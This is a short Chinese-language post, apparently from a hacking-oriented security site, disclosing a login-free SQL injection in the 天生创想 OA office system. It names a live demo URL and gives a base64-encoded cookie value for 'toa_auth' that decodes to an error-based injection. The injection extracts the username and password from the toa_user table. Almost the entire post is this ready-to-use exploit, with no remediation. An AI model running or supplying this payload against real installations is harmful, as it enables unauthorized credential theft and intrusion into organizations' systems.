天生创想OA系统无需登陆SQL注入
与之前在我们黑吧安全网发布的那个漏洞不同,这个不需要登录
测试地址:http://demo1.515158.com/index.php
在cookie中添加:toa_auth
内容为:MQlkM2FmNTA5MzM1YmRlZjg3ZTcxZDBkY2M2OGNmNjNmOScsKFNlTGVjdCAxIEZST00gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoZmxvb3IocmFuZCgwKSoyKSwoc3Vic3RyaW5nKChzZWxlY3QgKHNlbGVjdCBjb25jYXQoMHgyMyxjYXN0KGNvbmNhdCh1c2VybmFtZSwweDNhLHBhc3N3b3JkLDB4M2EpIGFzIGNoYXIpLDB4MjMpIGZyb20gdG9hX3VzZXIgTElNSVQgMCwxKSksMSw2MikpKWEgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IGEpYiksJzEnLCcyMTAxODU2Mjc3JyktLSAt
然后访问
http://demo1.515158.com/index.php